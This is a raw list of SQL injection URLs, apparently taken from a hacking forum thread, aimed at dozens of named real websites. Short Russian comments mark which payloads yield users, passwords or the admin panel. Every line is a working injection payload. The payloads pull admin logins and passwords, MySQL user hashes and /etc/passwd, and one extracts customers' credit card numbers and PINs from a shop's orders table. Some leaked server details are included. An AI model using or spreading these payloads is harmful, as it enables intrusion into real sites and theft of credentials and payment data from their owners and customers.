familyrapp.com PR 4 http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=1508+or+1=@@version (2000 ветка,поддержки xml raw нету) http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=1508+or+1=(select+top+1+username+from+login+where+username+not+in+(select+top+0+username+from+login)) (юзвери) http://www.familyrapp.com/Results/recipe_book_category_results_review.asp?BookID=1508+or+1=(select+top+1+password+from+login+where+password+not+in+(select+top+0+password+from+login)) (пароли)
_http://fmv.bz/jp/item.php?i=-24+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10,11,12-- 5.0.51a-log:[email protected]:sddb0025016300
indusites.com http://indusites.com/press/press-release-details.asp?id=141+or+1=@@version (2005 ветка ) http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+9+table_name+from+information_schema.tables)) (нужная нам таблица) http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+top+1+column_name+from+information_schema.columns+where+table_name='tblAdmin'+and+column_name+not+in+(select+top+0+column_name+from+information_schema.columns+where+table_name='tblAdmin'+group+by+column_name)+group+by+column_name+for+xml+raw) (перебираем колонки) http://indusites.com/press/press-release-details.asp?id=141+or+1=(select+quotename(username%2B':'%2Buserpassword)+from+tblAdmin) (логин и пароль админа ) http://indusites.com/admin/ (сама админка)
http://ichep04.ihep.ac.cn/db/abs_cont1.php?session_no=3&id=-548+union+select+1,unhex(hex(concat_ws(0x3a,user,password))),3,4,5,6,load_file('/etc/passwd'),8,9,0,11,12,13,14,15,16,17,18,19+from+mysql.user--
HTML: http://www.kimallansilk.com/productdetail.php?proid=-1+union+select+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11+from+information_schema.tables+limit+0,1-- HTML: http://www.forest-products.co.uk/products.php?id=-181+UnIon+selECt+1,2,3,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),5,6,7,8,9,10+from+information_schema.tables+limit+0,1--
http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,concat_ws(0x3a,user,password,host,file_priv),4,5,6,7,8+from+mysql.user http://www.pricon.co.in/newsview.php?newsid=7+and+1=0+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8
HTML: http://www.boredatuni.com/stuff.php?stuffId=-73+union+select+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3+from+information_schema.tables+limit+0,1-- HTML: http://www.toonecards.com/view-free-stuff.php?id=-20+UnIon+selECt+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+ HTML: http://www.sandwichbau.de/newsview.php?newsid=-118+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11+from+information_schema.tables+limit+0,1-- HTML: http://www.antoniandalison.co.uk/shop.php?category=-4+union+select+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1)+from+information_schema.tables+limit+0,1-- HTML: http://www.griefencounter.org.uk/shop.php?ShopID=-5+union+select+1,version(),3,4--+ HTML: http://www.skye.co.uk/local-media-shop.php?catid=-14+union+select+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6+from+information_schema.tables+limit+0,1-- HTML: http://www.brokenpencil.com/view.php?id=-5392+UnIon+selECt+1,2,3,4,5,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),7,8,9,10,11,12+from+information_schema.tables+limit+0,1-- HTML: http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,concat_ws(0x3a,FirstName,LastName,ShippingAddress,Country,City,State,Zip,Email,Phone,CreditCardType,CreditCardNumber,CreditCardName,CreditCardExpiryDate,CreditCardPinNumber),6,7,8+from+shop_orders--
http://www.alcobex.com/newsview.php?newsid=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10-- (вывод в титле) http://www.sandwichbau.de/newsview.php?newsid=-85+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11-- http://snow-country.jp/festival/contents.php?id=-10+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--
http://www.job-passport.com/en/activity_detail.php?actid=-21%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12 -- не нашёл админку ver:5.0.77 datadir:/var/lib/mysql/ base:jobpass_test tmpdir:/tmp/ user:jobpass@localhost os:redhat-linux-gnu basedir:/usr/
http://www.povareschka.ru/prod.php?id=4+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+--&sort=9 tables: administrator, user --------------------------------------------------- http://www.ucamind.com/prod.php?id=4+union+select+1,group_concat(0x0b,id,0x3a,username,0x3a,password),3,4,5,6,7,8+from+adminlogin+--
http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,database(),user(),version()),7,8,9,10,11,12,13,14,15,16,17 http://www.maind.com/catalog/add2cart.asp?id=-26+union+select+1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17+from+admin
http://www.npomagr.ru/prod.php?id=4+union+select+1,2,3,concat_ws(0x3a,ID,Name,Password),5,6+from+_magr_users--
http://www.breedjewelry.com/view_detail.asp?id=395+or+1=@@version-- http://www.breedjewelry.com/view_detail.asp?id=395+or+1=(select+top+1+quotename(userid%2B':'%2Bpassword)+from+admin)--
HTML: http://www.walkerbooks.com/books/catalog.php?key=-883+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+limit+0,1-- HTML: http://museummasterworks.com/Catalog.php?page=-3+UnIon+selECt+1,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),3,4+from+information_schema.tables+limit+0,1-- HTML: http://www.southiceland.com/main.php?cat=-2+UnIon+selECt+1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9+from+information_schema.tables+limit+0,1--
christianactivities.com PR 5 http://www.christianactivities.com/artistupdates/story.asp?ID=-4308+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12-- http://www.soupbase.com/view.asp?cid=2706+or+1=@@version http://wecsa.co.za/squadupdates.asp?id=1+or+1=@@version
http://www.thesame-innovation.com/Thesame/Prod/Prod.php?Id=-4+union+select+1,group_concat(0x0b,Id_Admin,0x3a,Titre_Admin,0x3a,Pass_Admin),3,4,5+from+Admin+--
gmvnl.com PR - 6 http://www.gmvnl.com/newgmvn/updates/updates.asp?id=12+or+1=(select+system_user)-- http://www.mrtoys-games.com.au/Store_details.asp?ID=6+or+1=@@version
http://support.optis-world.com/press_release_details.asp?Product_id=12281+or+1=@@version http://www.hirestrategy.com/articles/feature_content.asp?ID=56+or+1=@@version http://www.mrsfixit.com/fixits/FixitCategoryList.asp?id=69+or+1=@@version
http://www.che-esche.ru/posts.php?id=-100+union+select+1,2,3,4,group_concat(TABLE_NAME),6,7,8,9+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,10+--+ таблица users_tbl ////https://forum.antichat.ru/printthread.php?t=21336&page=293&pp=40 http://www.che-esche.ru тоже самое что и http://www.che-esche.com
